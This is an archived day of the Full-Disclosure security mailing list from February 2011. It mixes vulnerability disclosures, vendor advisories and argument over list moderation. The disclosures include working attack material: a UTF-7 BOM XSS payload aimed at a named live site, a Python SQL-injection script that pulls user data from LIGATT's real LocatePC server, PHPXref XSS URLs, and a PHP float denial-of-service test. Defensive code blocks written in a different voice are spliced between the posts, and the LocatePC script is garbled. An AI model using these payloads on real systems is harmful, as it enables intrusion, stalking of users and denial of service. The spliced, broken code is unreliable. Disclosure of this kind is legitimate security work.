[Full-disclosure] xss attacks through utf7-BOM string injection

2011-02-09 Thread IEhrepus
xss attacks through utf7-BOM string injection

the beginning of the utf-7 BOM character trick is from Gareth Heyes's paper "XSS
Lightsabre techniques"

-start--
CSS expressions with UTF-7
• UTF-7 BOM character can force UTF-7 in a external style sheet
• Would you let me upload a style sheet?
• @charset 'UTF-7'; works
• But you don't need it
• +/v8 is all you need
+/v8
body {
font-family:
'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbA
BlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';
---end-

this example is for a style sheet, and it works well on an html file too, like this demo:
http://www.80vul.com/test/utf7.htm. the file format is only based on the
first four bytes and the space. so if we can control the beginning bytes of
an html file, then we can inject any html/javascript code, which leads to
xss attacks.

json-callback + utf7-BOM string injection == lots of xss vuls

online, lots of sites set the json file's Content-Type to text/html, and
the callback function name at the first bytes is a variable. so it leads to xss
vuls using utf7-BOM string injection.

the demo:

http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDscallback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-%20xsadas

and u can use Google hacking to find where the callbacks are:

site:80vul.com inurl:callback


Happy New Year!

thanks Mario Heiderich for telling me what +/v8 is :)
thanks Gareth Heyes for the nice paper.

--superhei from http://www.80vul.com

--ad--
About Ph4nt0m Webzine

Ph4nt0m Webzine is a free network security magazine. We accept articles in
English and Chinese; contributions are welcome.
Please mail root_at_ph4nt0m.org. Thank you!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
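The JSONP callback case from the post above, as an added defensive example (not superhei's code): it decodes the demo's callback parameter the way a UTF-7-switched browser would, flags it, and shows a JSONP responder hardened with a callback allowlist, a fixed `/**/` prefix so the first bytes of the body are never attacker-chosen, and a JavaScript Content-Type with nosniff. The helper names are this example's own, and the `/**/` prefix and nosniff header are standard JSONP hardening that the post itself does not mention.

```python
# Added example (not from the original post): detection and mitigation for the
# JSONP + UTF-7 BOM injection described above. Helper names are this example's own.
import base64
import re

# UTF-7 shift sequence that decodes to U+FEFF. A browser that finds it in the
# first bytes of a text/html body switches the whole document to UTF-7.
UTF7_BOM = "+/v8"

# Callback value from the demo URL in the post, after URL-decoding
# (%2B -> '+', %2F -> '/', %20 -> ' ').
DEMO_CALLBACK = ("+/v8 +ADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0"
                 "ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg- xsadas")

# Allowlist: a JavaScript identifier, optionally dotted ("jQuery.cb123"), nothing else.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MARKUP_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def utf7_shift(text: str) -> str:
    """Encode `text` as one UTF-7 shift sequence: '+' + base64(UTF-16BE) + '-'.

    Used here only to build constructed test input; every character goes through
    base64, so the raw parameter contains no '<' or '>' for a naive filter to see.
    """
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii").rstrip("=")
    return "+" + b64 + "-"


def decode_as_utf7(raw: str):
    """Return what a UTF-7-decoding browser would see, or None if malformed."""
    try:
        return raw.encode("ascii", errors="replace").decode("utf-7")
    except UnicodeDecodeError:
        return None


def looks_like_utf7_bom_injection(param: str) -> bool:
    """Detection rule: the parameter starts with the UTF-7 BOM and decodes to markup."""
    if not param.startswith(UTF7_BOM):
        return False
    decoded = decode_as_utf7(param)
    return decoded is not None and MARKUP_RE.search(decoded) is not None


def jsonp_response(callback: str, json_body: str):
    """Hardened JSONP responder returning (status, headers, body).

    Three independent fixes, any one of which defeats the demo:
      1. allowlist the callback name instead of echoing arbitrary bytes;
      2. a fixed '/**/' prefix, so the first four bytes are never attacker-chosen;
      3. a JavaScript Content-Type plus nosniff instead of text/html.
    """
    if not CALLBACK_RE.match(callback):
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid callback name"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, "/**/" + callback + "(" + json_body + ");"


if __name__ == "__main__":
    print(repr(decode_as_utf7(DEMO_CALLBACK)))          # BOM followed by HTML markup
    print(looks_like_utf7_bom_injection(DEMO_CALLBACK))  # True
    print(jsonp_response(DEMO_CALLBACK, '{"ok": true}')[0])  # 400
    print(jsonp_response("handleItem", '{"ok": true}'))
```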

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread David Klein
Full disclosure means just that, unfortunately we have to take all the bad
with the good.

Sure it would work well for messages just being trolls/profanities and
whatnot, but it would be up to the moderator to determine if something falls
into a non desirable category.

I am sure you can see at this point it becomes complicated. What if an issue
compromising national security gets posted (wetdream), would the moderator
remove it or keep it?

I believe it's asking a lot for someone to moderate this list, it may not
seem it but it's a huge ethical responsibility. 


especially if a vendor ends up having a say in the moderation

Regards,

David Klein

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi
Guninski
Sent: Wednesday, February 09, 2011 7:30 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

is FD moderated or not? (hint: ask n3td3v).

i suggest this inconsistency be fixed in one way or another :)

-- 
joro



[Full-disclosure] CGI:IRC XSS issue (CVE-2011-0050)

2011-02-09 Thread David Leadbeater
Michael Brooks (Sitewatch) discovered an XSS issue in the nonjs
interface that allowed HTML injection via a crafted parameter.

0.5.10 is now available. This is actually just 0.5.9 with the
following fix:

- CVE-2011-0050: XSS in R param in nonjs interface

David



Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread huj huj huj
moderation on this list is moot since people just sign up with a new email
address
as i have done several times in the past years

2011/2/8 David Klein david.kl...@ipfocus.com.au

 Full disclosure means just that, unfortunately we have to take all the bad
 with the good.

 Sure it would work well for messages just being trolls/profanities and
 whatnot, but it would be up to the moderator to determine if something
 falls
 into a non desirable category.

 I am sure you can see at this point it becomes complicated. What if an
 issue
 compromising national security gets posted (wetdream) would the moderator
 remove it or keep it?

 I believe it's asking a lot for someone to moderate this list, it may not
 seem it but it's a huge ethical responsibility.


 especially if a vendor ends up having a say in the moderation

 Regards,

 David Klein

 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi
 Guninski
 Sent: Wednesday, February 09, 2011 7:30 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

 is FD moderated or not? (hint: ask n3td3v).

 i suggest this inconsistency be fixed in one way or another :)

 --
 joro


Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread huj huj huj
moderated as in he removes people he thinks crosses the line
and it has been done for a lot longer than that
so no andrew you are not special.. it did not happen due to your inane
ramblings

2011/2/9 andrew.wallace andrew.wall...@rocketmail.com

  On Wed, Feb 9, 2011 at 12:45 PM, huj huj huj datski...@gmail.com wrote:
  moderation on this list is moot since people just sign up with a new
 email
  address
  as i have done several times in the past years

 The list has been moderated since January 21, 2009. This includes any new
 sign-ups, which are automatically moderated.

 http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/067676.html

 Andrew




Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread huj huj huj
fair enough
i stand corrected
however the old practice you mentioned in the earlier post has been going on
for years
maybe you should have posted this link in that post :)

2011/2/9 andrew.wallace andrew.wall...@rocketmail.com

  On Wed, Feb 9, 2011 at 12:59 PM, huj huj huj datski...@gmail.com wrote:
  moderated as in he removes people he thinks crosses the line
  and it has been done for a lot longer than that
  so no andrew you are not special.. it did not happen due to your inane
  ramblings

 You're talking rubbish because it was mentioned here:

 http://lists.grok.org.uk/pipermail/full-disclosure/2010-March/073809.html

 *Every* new email address from *everyone* is moderated.

 Andrew



[Full-disclosure] trivial SQL injection in LIGATT Security's LocatePC software

2011-02-09 Thread auto79576760
trivial SQL injection in LIGATT Security's LocatePC software

--

I'm going to skip all the drama and get straight to it. The 
software is crap.

Affected Software:

LocatePC 1.05

Consequences:

Arbitrary SELECT queries against the LocatePC and mysql database. 
The LocatePC database contains enough information to stalk all 
users of the software. It may be possible to instruct the software 
to upload arbitrary files from each user's computer to the LocatePC 
database, and then to later extract those files from the database.
Activating the software's keylogging functionality is both possible 
and hilarious.

Proof of Concept:

#!/usr/bin/python
import httplib
import urllib
import xml.etree.ElementTree
h = httplib.HTTPSConnection('www.ligattsecurity.com')
p = '''Request 
funcname=uName,mac_address,last_login_ip,program_login from user 
where LENGTH(last_login_ip)  0;--/Request'''
h.request(POST,/locatePC/api/,p,{ContentType:application/x-
www-form-urlencoded})
r = h.getresponse()
data = urllib.unquote_plus(r.read())
for i in xml.etree.ElementTree.fromstring(data).iter():
if i.tag == Row:
print 
elif i.tag == Cell and i.text != None:
print i.text

Solution:

DON'T USE LOCATEPC!!!

References:

- http://www.ligattsecurity.com/solutions/locate-pc



Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread huj huj huj
2011/2/9 andrew.wallace andrew.wall...@rocketmail.com

  On Wed, Feb 9, 2011 at 1:25 PM, huj huj huj datski...@gmail.com wrote:
  fair enough
  i stand corrected
  however the old practice you mentioned in the earlier post has been going
 on
  for years
  maybe you should have posted this link in that post :)

 The only thing I got wrong was the date: I said January 21, it was actually
 January 30, 2009 the moderation first began.

 My apologies,

 Andrew




Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread Christian Sciberras
Well, eventually even complete idiots get tired at beating rocks together
thinking they're doing some noise



On Wed, Feb 9, 2011 at 2:58 PM, huj huj huj datski...@gmail.com wrote:



 2011/2/9 andrew.wallace andrew.wall...@rocketmail.com

  On Wed, Feb 9, 2011 at 1:25 PM, huj huj huj datski...@gmail.com wrote:
  fair enough
  i stand corrected
  however the old practice you mentioned in the earlier post has been
 going on
  for years
  maybe you should have posted this link in that post :)

 The only thing I got wrong was the date: I said January 21, it was
 actually January 30, 2009 the moderation first began.

 My apologies,

 Andrew





Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread huj huj huj
Doubtful

2011/2/9 Christian Sciberras uuf6...@gmail.com

 Well, eventually even complete idiots get tired at beating rocks together
 thinking they're doing some noise



   On Wed, Feb 9, 2011 at 2:58 PM, huj huj huj datski...@gmail.com wrote:



  2011/2/9 andrew.wallace andrew.wall...@rocketmail.com

   On Wed, Feb 9, 2011 at 1:25 PM, huj huj huj datski...@gmail.com
 wrote:
  fair enough
  i stand corrected
  however the old practice you mentioned in the earlier post has been
 going on
  for years
  maybe you should have posted this link in that post :)

 The only thing I got wrong was the date: I said January 21, it was
 actually January 30, 2009 the moderation first began.

 My apologies,

 Andrew





[Full-disclosure] Vulnerabilities in PHPXref

2011-02-09 Thread MustLive
Hello list!

I want to warn you about Cross-Site Scripting and Remote HTML Include 
vulnerabilities in PHPXref.

-
Affected products:
-

Vulnerable are PHPXref 0.7 and previous versions. In version PHPXref 0.7.1 
the developer fixed these vulnerabilities.

--
Details:
--

XSS (RXI) (WASC-08):

http://site/nav.html?javascript:alert(document.cookie)

RHI (WASC-12):

http://site/nav.html?http://websecurity.com.ua


Timeline:


2010.12.27 - announced at my site.
2010.12.28 - informed developers.
2010.12.29 - PHPXref 0.7.1 released 
(http://phpxref.sourceforge.net/Changelog).
2011.02.08 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4795/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



[Full-disclosure] [HITB-Announce] HITB Magazine Issue 005 Released

2011-02-09 Thread Hafez Kamal
We are proud to announce the immediate availability of HITB Magazine
Issue 005 - The first HITB Magazine release for 2011!

HITB Magazine
=
http://magazine.hackinthebox.org/

Direct Link
===
http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-005.pdf

Just over a year has passed since Issue 001, and 2010 was definitely a
great year for our humble magazine, with over 100,000 downloads of the
4 issues released, which included 24 unique technical articles authored
or co-authored by over 30 security experts from around the world! Since
April 2010, readers have also had an opportunity to get familiar with
prominent figures from the IT security industry thanks to the new
Interviews section.

As always, feedback of any kind is greatly appreciated so don't hesitate
to drop us a line if you have any suggestions or comments on the issue.

Stay tuned for Issue 006 which will be released in May 2011 in
conjunction with our 2nd annual HITB Security Conference in Europe,
HITB2011 - Amsterdam!

See you there and in the meantime, enjoy the issue!

- The HITB Editorial Team

---
Hafez Kamal
HITB Crew
Hack in The Box (M) Sdn. Bhd.
Suite 26.3, Level 26, Menara IMC,
No. 8 Jalan Sultan Ismail,
50250 Kuala Lumpur,
Malaysia

Tel: +603-20394724
Fax: +603-20318359



Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-09 Thread Georgi Guninski
On Wed, Feb 09, 2011 at 01:45:27PM +0100, huj huj huj wrote:
 moderation on this list is moot since people just sign up with a new email
 address
 as i have done several times in the past years

hm, i thought having more than one actor (possibly a one-time actor) was common
practice on this list...

i've done it too, only 2 ppl showed they got it the actor buried a 0day 
(developers got it several months later. please don't spoil the plot).



[Full-disclosure] [ MDVSA-2011:024 ] krb5

2011-02-09 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:024
 http://www.mandriva.com/security/
 ___

 Package : krb5
 Date: January 9, 2011
 Affected: 2009.0, 2010.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered and corrected in krb5:
 
 The MIT krb5 Key Distribution Center (KDC) daemon is vulnerable
 to denial of service attacks from unauthenticated remote attackers
 (CVE-2011-0281, CVE-2011-0282).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0281
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0282
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-002.txt
 ___

 Updated Packages:


[Full-disclosure] TPTI-11-01: Adobe Shockwave dirapi.dll IFWV Trusted Offset Remote Code Execution Vulnerability

2011-02-09 Thread ZDI Disclosures
TPTI-11-01: Adobe Shockwave dirapi.dll IFWV Trusted Offset Remote Code 
Execution Vulnerability

http://dvlabs.tippingpoint.com/advisory/TPTI-11-01

February 8, 2011

-- CVE ID:
CVE-2010-4188

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10817. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the DIRAPI.dll module distributed with
the player. While parsing a director movie (.dir or .dcr) the code
trusts the specified size of the IFWV chunk and uses it within a
calculation to determine another offset within the file. By setting it
to 0, the code jumps to the wrong location within the file. While
parsing data at the new location, the code uses a value as a loop
counter. Within the loop, the code copies data to a heap buffer. By
crafting a file with a large enough size, this loop can be forced to
corrupt memory. A remote attacker can abuse this logic to execute
arbitrary code under the context of the user running the application.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb11-01.html

-- Disclosure Timeline:
2010-11-15 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aaron Portnoy and Logan Brown, TippingPoint DVLabs



[Full-disclosure] TPTI-11-02: Adobe Shockwave TextXtra Invalid Seek Remote Code Execution Vulnerability

2011-02-09 Thread ZDI Disclosures
TPTI-11-02: Adobe Shockwave TextXtra Invalid Seek Remote Code Execution 
Vulnerability

http://dvlabs.tippingpoint.com/advisory/TPTI-11-02

February 8, 2011

-- CVE ID:
CVE-2011-0555

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Shockwave. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the code responsible for parsing a DEMX
RIFF chunk within Director files. The logic within the TextXtra.x32
module fails to account for a specific condition and can be made to
misallocate a buffer on the heap. By crafting specific values within
DEMX substructures an attacker can corrupt memory leading to arbitrary
code execution under the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb11-01.html

-- Disclosure Timeline:
2010-12-16 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Logan Brown, TippingPoint DVLabs



[Full-disclosure] TPTI-11-03: Adobe Shockwave Font Xtra String Decoding Remote Code Execution Vulnerability

2011-02-09 Thread ZDI Disclosures
TPTI-11-03: Adobe Shockwave Font Xtra String Decoding Remote Code Execution 
Vulnerability

http://dvlabs.tippingpoint.com/advisory/TPTI-11-03

February 8, 2011

-- CVE ID:
CVE-2011-0556

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the Font Xtra.x32 asset module
responsible for parsing font structures within Director movie files
(.dir). When parsing data within the PFR1 chunk, the process implicitly
sign-extends a 16-bit size value and seeks pointers accordingly. It then
operates upon the data it has reached which can be abused by an attacker
to corrupt memory and subsequently execute arbitrary code under the
context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb11-01.html

-- Disclosure Timeline:
2010-12-16 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Logan Brown, TippingPoint DVLabs



[Full-disclosure] TPTI-11-04: Adobe Shockwave GIF Logical Screen Descriptor Parsing Remote Code Execution Vulnerability

2011-02-09 Thread ZDI Disclosures
TPTI-11-04: Adobe Shockwave GIF Logical Screen Descriptor Parsing Remote Code 
Execution Vulnerability

http://dvlabs.tippingpoint.com/advisory/TPTI-11-04

February 8, 2011

-- CVE ID:
CVE-2010-4189

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the IML32 module distributed with the
player. While parsing GIF files within a director movie (.dir or .dcr)
the code trusts the specified size of the global color table and uses it
to determine an offset to image data. The process subsequently attempts
to write two NULL bytes to the calculated address. A remote attacker can
abuse this logic to corrupt memory at a controlled location and
subsequently execute arbitrary code under the context of the user
running the application.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb11-01.html

-- Disclosure Timeline:
2010-11-15 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aaron Portnoy, TippingPoint DVLabs



[Full-disclosure] TPTI-11-05: Adobe Shockwave PFR1 Font Chunk Parsing Remote Code Execution Vulnerability

2011-02-09 Thread ZDI Disclosures
TPTI-11-05: Adobe Shockwave PFR1 Font Chunk Parsing Remote Code Execution 
Vulnerability

http://dvlabs.tippingpoint.com/advisory/TPTI-11-05

February 8, 2011

-- CVE ID:
CVE-2011-0569

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10825. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the code responsible for parsing font
structures within Director files. While processing data within the PFR1
chunk, the process trusts a size value and compares a sign-extended
counter against it within a copy loop. By providing a sufficiently large
value, this flaw can be abused by a remote attacker to execute arbitrary
code under the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb11-01.html

-- Disclosure Timeline:
2011-01-24 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Logan Brown and Aaron Portnoy, TippingPoint DVLabs
* Luigi Auriemma



[Full-disclosure] [ MDVSA-2011:025 ] krb5

2011-02-09 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:025
 http://www.mandriva.com/security/
 ___

 Package : krb5
 Date: January 9, 2011
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered and corrected in krb5:
 
 The MIT krb5 KDC database propagation daemon (kpropd) is vulnerable to
 a denial-of-service attack triggered by invalid network input.  If a
 kpropd worker process receives invalid input that causes it to exit
 with an abnormal status, it can cause the termination of the listening
 process that spawned it, preventing the slave KDC it was running on
 from receiving database updates from the master KDC (CVE-2010-4022).
 
 The MIT krb5 Key Distribution Center (KDC) daemon is vulnerable
 to denial of service attacks from unauthenticated remote attackers
 (CVE-2011-0281, CVE-2011-0282).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4022
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0281
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0282
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-001.txt
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-002.txt
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of 

[Full-disclosure] Drupal Data Module Multiple Vulnerabilities

2011-02-09 Thread Justin Klein Keane
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Description of Vulnerability:

Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL. The Drupal Data module
(http://drupal.org/project/data) helps you model, manage and query
related sets of tables. It offers an administration interface and a low
level API for manipulating tables and accessing their contents.

The Data module contains multiple Cross Site Scripting (XSS)
vulnerabilities because it fails to sanitize table descriptions, field
names or labels before display.  This results in multiple stored XSS as
well as DOM based XSS vulnerabilities.  Drupal site users with the
ability to create or edit tables using the Data module could inject
arbitrary HTML into administrative pages.

The Data module also contains numerous SQL injection vulnerabilities
because it fails to sanitize values for table names or column names
before invoking SQL statements.  This allows users with the ability to
create or edit tables managed by the Data module to perform SQL
injection attacks.

Systems affected:

Drupal 6.20 with Data 6.x-1.0-alpha14 was tested and shown to be vulnerable.

Impact

User could inject arbitrary scripts into pages affecting site users.
This could result in administrative account compromise leading to web
server process compromise. A more likely scenario would be for an
attacker to inject hidden content (such as iframes, applets, or embedded
objects) that would attack client browsers in an attempt to compromise
site users' machines. This vulnerability could also be used to launch
cross site request forgery (XSRF) attacks against the site that could
have other unexpected consequences.

Mitigating factors:

In order to exploit this vulnerability the attacker must have
credentials to an authorized account that has been assigned the
permissions to administer or edit in the Data module. This could be
accomplished via social engineering, brute force password guessing, or
abuse of legitimate credentials.

Vendor response:

Drupal security team does not handle issues with pre-release versions of
modules (such as alpha or dev). These issues were reported in the
module's public issue queue (http://drupal.org/node/1056470).

The text of this advisory has also been posted at
http://www.madirish.net/?article=480

-- 
Justin C. Klein Keane
http://www.MadIrish.net

The digital signature on this message can be confirmed
using the public key at http://www.madirish.net/gpgkey

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
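As an added illustration of the two bug classes the advisory describes (this is example code, not code from the Data module or from the advisory's author), the following PHP shows a user-controlled identifier spliced into SQL and an unescaped label echoed into HTML, each beside a hardened form. The function names, the known-table list and the sample inputs are constructed for the example.

```php
<?php
// Added example, not code from the Data module or the advisory: the two bug
// classes described above (unsanitized identifiers in SQL, unsanitized labels
// in HTML) beside a hardened form. Function names and inputs are constructed.

// Vulnerable: a user-controlled table or column name is spliced into the SQL.
function build_query_vulnerable(string $table, string $column): string
{
    return "SELECT {$column} FROM {$table}";
}

// Identifiers cannot be passed as bound parameters, so the hardened form
// restricts them to a safe character class (the same idea as Drupal 6's
// db_escape_table()) and, where possible, to a known list of tables.
function safe_identifier(string $name, array $allowed = []): string
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $name)) {
        throw new InvalidArgumentException("unsafe identifier: {$name}");
    }
    if ($allowed !== [] && !in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("unknown table: {$name}");
    }
    return $name;
}

function build_query_hardened(string $table, string $column, array $known_tables): string
{
    $t = safe_identifier($table, $known_tables);
    $c = safe_identifier($column);
    return "SELECT `{$c}` FROM `{$t}`";
}

// Vulnerable: a table description or field label is echoed into admin HTML.
function render_label_vulnerable(string $label): string
{
    return "<th>{$label}</th>";
}

// Hardened: escape on output (Drupal 6's check_plain() does the same job).
function render_label_hardened(string $label): string
{
    return '<th>' . htmlspecialchars($label, ENT_QUOTES, 'UTF-8') . '</th>';
}

// Constructed inputs of the kind a user with table-editing rights could submit.
$known_tables = ['data_table_orders', 'data_table_items'];
$table        = 'data_table_orders';
$column       = 'name FROM users -- ';
$label        = '<script>alert(1)</script>';

// The vulnerable helpers pass the injected SQL and the script tag straight through.
echo build_query_vulnerable($table, $column), "\n";
echo render_label_vulnerable($label), "\n";

// The hardened helpers reject the column name and neutralise the label.
try {
    echo build_query_hardened($table, $column, $known_tables), "\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo build_query_hardened($table, 'name', $known_tables), "\n";
echo render_label_hardened($label), "\n";
```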


[Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Leon Kaiser
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server


Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Christian Sciberras
Was it fixed? What's the current status?

This sounds like a major issue, and the lack of info about it is darn
impressive.


I tried it on my test Windows WAMP server:

<?php

ob_implicit_flush(true);

echo 'Start test...<br/>';

// The literal below is the value reported to hang PHP's string-to-double conversion.
$f=(float)2.2250738585072011e-308;
echo 'Try 1 = '.$f.'<br/>';

$f=floatval(2.2250738585072011e-308);
echo 'Try 2 = '.$f.'<br/>';

$f=2.2250738585072011e-308;
echo 'Try 3 = '.(float)$f.'<br/>';

echo 'Test failed, server not vulnerable!<br/>';

?>

All three tests succeeded in crashing the server.

With all due respect, this should NOT have been disclosed without being
FIXED (as it seems to me).
Plus, I'm a bit amazed such a bug exists in PHP - since converting to
floating point is a trivial operation, it should have been limited and
safe-guarded from the start.
There are a lot of servers out there happily accepting input as floating
point values, this bug should be top priority...


Chris.




Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Christian Sciberras
Ah, been reading more about it, seems it was fixed.

Still, there should have been safeguards around this - I'm thinking they
should check existing conversion routines to ensure they're safe...





Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Cal Leeming [Simplicity Media Ltd]
Christian, this issue has been 'floating' around for several months now.


Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Valdis . Kletnieks
On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said:

 $f=floatval(2.2250738585072011e-308);
 echo 'Try 2 = '.$f.'<br/>';

 Plus, I'm a bit amazed such a bug exists in PHP - since converting to
 floating point is a trivial operation, it should have been limited and
 safe-guarded from the start.

Take a careful gander at that number, then go look at the floating point spec -
it's a specific corner case that isn't obviously trivial to get right (doing
floating point *right* is a lot harder than it looks - take a class on
numerical methods sometime, you spend 75% of your time dealing with rounding
errors in the last bit).

Having said that, anybody writing floating point support for a package should
probably google 'floating point paranoia' and learn what sort of things to test
for. :)




Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Christian Sciberras
